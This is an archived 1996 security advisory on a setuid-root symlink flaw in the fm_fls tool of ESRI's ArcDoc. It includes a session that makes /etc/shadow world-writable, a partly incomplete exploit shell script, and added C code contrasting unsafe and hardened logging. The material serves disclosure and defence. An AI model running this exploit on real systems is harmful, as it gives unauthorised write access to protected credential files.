Security problem in ESRI's ArcDoc 7.0.4
From: jwa () nbs nau edu (James W. Abendschan)
Date: Thu, 23 May 1996 21:21:46 -0700
*** GIS & ESRI/ARC/Info shops take note! ***
The program "fm_fls" as distributed with ESRI's "ArcDoc" package (7.0.4)
contains a bug which allows us to (a) add somewhat arbitrary data
to any file and (b) change the permissions of that file to rw-rw-rw-.
fm_fls is setuid root.
When fm_fls is executed, it opens up a logfile -- the default location
for this file is /tmp/fm_fls.log. Unfortunately, it doesn't
check if this file already exists or if this file has any symlinks
attached to it. If for some reason fm_fls gets bad arguments, it
will write these bad arguments to the logfile, chown the file to
root, give the file 666 permissions, and exit.
If we make a link from this file to an unreadable file, we
can both append the contents of the logfile into the unreadable
file and gain world rw access to the file.
ecosys:~jwa/Security/Projects/r00tin> ls -l /etc/shadow
-rw------- 1 root other 1851 May 23 20:22 /etc/shadow
ecosys:~jwa/Security/Projects/r00tin> fm.sploit /etc/shadow
/nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls: Error. Unable to open License File woot
fm.sploit of /etc/shadow yields:
-rw-rw-rw- 1 root other 2011 May 23 20:38 /etc/shadow
ecosys:~jwa/Security/Projects/r00tin> tail -5 /etc/shadow
1996/05/23-20:38:32 BG woot ecosys
# 1996/05/23-20:38:32 /nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls: Error. Unable to open License
Note the additional lines appended to the target file (in this case,
To fix this, either (a) yell at your vendor or (b) chmod 555 `which fm_fls`.
I don't yet know the effects of removing the suid bit on fm_fls; I'd
like to hear feedback on this. I've seen fm_fls distributed with
other applications -- perhaps the bug is not specific to ARC/Info?
Comments are welcome.
#!/bin/sh
# exploit a bug in the fm_fls application as distributed with ARC/Info's
# ArcDoc (and others?) to give us rw access to any file.
# fix: chmod 555 `which fm_fls`
# tested on Solaris 2.5 w/ ArcDoc 7.0.4
# James Abendschan jwa () nbs nau edu 23 May 1996

# full path to the fm_fls executable
# (the assignment and the line that later invokes fm_fls with bad arguments
# did not survive in the archived copy of this post; the path shown in the
# session above was /nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls)
LOGFILE=/tmp/fm_fls.log
TMP=/tmp/fm_fls.tmp     # intermediate link name; placeholder, original value lost in the archive

if [ $# != 1 ]
then
    echo "usage: `basename $0` filename"
    exit 1
fi
UNREADABLE=$1

rm -f $LOGFILE
if [ -f $LOGFILE ]
then
    echo "tried to remove $LOGFILE, but it still exists! Exploit won't work."
    exit 1
fi

# since fm_fls will complain if we link to a logfile too "far away"
# from the original file, we just do a dual link..
ln -s $UNREADABLE $TMP
ln -s $TMP $LOGFILE

# (fm_fls invocation with bad arguments went here; missing from the archive)

echo "`basename $0` of $UNREADABLE yields:"
ls -l $UNREADABLE

# all done, clean up.
rm -f $TMP $LOGFILE
James W. Abendschan Email: jwa () nbs nau edu
UNIX Systems Programmer/Administrator Phone: (520) 556-7466 x238
Colorado Plateau Research Station, Flagstaff, AZ Voice mail: *516
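The following is an added example, not code from the original post and not ESRI's fm_fls source. It reconstructs in C the logging pattern the advisory describes (open the log by name in /tmp, append the bad arguments, chmod the name to 0666) next to a hardened version that refuses links and pre-existing files, creates the log 0600, and sets permissions on the descriptor rather than the path. A small harness rebuilds the symlink scenario in a private temporary directory and reports whether the "secret" file behind the link was touched. Function names, the temp-directory layout and the logged error text are assumptions; how fm_fls really opened its log is not known from the post.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the advisory describes (hypothetical reconstruction, not
 * fm_fls's code): open the log by name, append, then chmod the *name* to
 * 0666. Every step resolves the path, so a symlink planted at the log
 * path redirects the write and the chmod to whatever it points at. */
static int log_error_unsafely(const char *logpath, const char *msg)
{
    int fd = open(logpath, O_WRONLY | O_CREAT | O_APPEND, 0666);
    ssize_t n;
    if (fd < 0)
        return -1;
    n = write(fd, msg, strlen(msg));
    (void)n;
    close(fd);
    return chmod(logpath, 0666);    /* path-based: follows the link again */
}

/* Hardened version: O_EXCL refuses any pre-existing name (a symlink
 * included), O_NOFOLLOW refuses links outright, the file is created
 * private, the opened object is re-checked through the descriptor, and
 * permissions are set with fchmod on that descriptor, never on the name. */
static int log_error_safely(const char *logpath, const char *msg)
{
    struct stat st;
    int fd = open(logpath, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;                  /* EEXIST/ELOOP: something was planted */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1
        || st.st_uid != geteuid()) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    if (fchmod(fd, 0600) != 0 || write(fd, msg, strlen(msg)) < 0) {
        close(fd);
        return -1;
    }
    close(fd);
    return 0;
}

typedef int (*logger_fn)(const char *, const char *);

/* Rebuild the advisory's scenario in a private temp dir (constructed
 * fixture): a 0600, empty "secret" file and a symlink named fm_fls.log
 * pointing at it. Run the given logger against the link and report what
 * happened to the secret.
 * Returns 1 if the secret was modified (mode no longer 0600 or it grew),
 *         0 if it was left untouched, -1 on setup failure. */
static int secret_modified_by(logger_fn logger)
{
    char dir[] = "/tmp/fmdemo.XXXXXX";
    char secret[PATH_MAX], logpath[PATH_MAX];
    struct stat st;
    int fd, result;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(secret, sizeof secret, "%s/secret", dir);
    snprintf(logpath, sizeof logpath, "%s/fm_fls.log", dir);
    fd = open(secret, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0)
        return -1;
    close(fd);
    if (symlink(secret, logpath) != 0)
        return -1;

    /* The logger's own return value is deliberately ignored: what matters
     * is the state of the file behind the link afterwards. */
    logger(logpath, "Error. Unable to open License File\n");

    if (stat(secret, &st) != 0)
        result = -1;
    else
        result = ((st.st_mode & 0777) != 0600 || st.st_size != 0) ? 1 : 0;

    unlink(logpath);
    unlink(secret);
    rmdir(dir);
    return result;
}

int main(void)
{
    printf("unsafe logger modified secret: %d\n", secret_modified_by(log_error_unsafely));
    printf("safe logger modified secret:   %d\n", secret_modified_by(log_error_safely));
    return 0;
}
```

Run as an ordinary user; no setuid bit is needed to see the difference, because the harness only demonstrates that path-based open/chmod follow the planted link while the descriptor-based version refuses it. In a real privileged program the remaining fix is the one the post gives for fm_fls: do not run it setuid root at all, and if a log must be written with privileges, write it under a directory the invoking user cannot create entries in rather than under /tmp.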